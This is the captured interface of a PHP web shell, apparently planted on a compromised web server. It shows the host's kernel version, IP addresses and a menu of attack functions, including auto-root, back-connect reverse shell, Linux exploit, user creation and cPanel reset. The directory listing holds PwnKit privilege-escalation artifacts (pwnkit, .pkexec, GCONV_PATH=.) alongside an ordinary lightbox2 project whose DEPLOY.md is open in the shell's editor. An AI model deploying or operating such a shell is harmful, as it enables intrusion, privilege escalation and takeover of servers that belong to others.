Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.163.26
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
assets /
lb /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.editorconfig
415
B
-rw-r--r--
.jscsrc
1.38
KB
-rw-r--r--
.jshintrc
547
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
DEPLOY.md
1.04
KB
-rw-r--r--
Gruntfile.js
1.84
KB
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
1.62
KB
-rw-r--r--
ROADMAP.md
2.88
KB
-rw-r--r--
bower.json
545
B
-rw-r--r--
package-lock.json
132.04
KB
-rw-r--r--
package.json
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DEPLOY.md
## How to Make a Release ### Build - **Checkout dev branch.** This will contain work queued up for the next release. - **Update version number.** Manually update version number in `src/lightbox.js` and `package.json`. Don't use `npm version`. - **Build and merge to `master`.** Run `grunt build`. Make sure you have run `bower install` ahead of this as it will pull down jQuery which is utilized in the build step. Push to `master`. ### Release - **Create tagged release.** Go to [Github Releases page](https://github.com/lokesh/lightbox2/releases). Draft a new release. Naming convention is `v2.8.1`. Add notes that link to PRs. - **`npm publish`**. No need to do anything for Bower as it is entirely based on the Github repo. ### Maintenance and Docs - **GH clean-up.** Close out issues with `[status] pending release`. - **Lightbox Site.** If there are any changes to the options, don't forget to update the [Lightbox Site](http://localhost:8000/dist/#options). The code lives in a separate repo, [lightbox2-site](https://github.com/lokesh/lightbox2-site/).
Close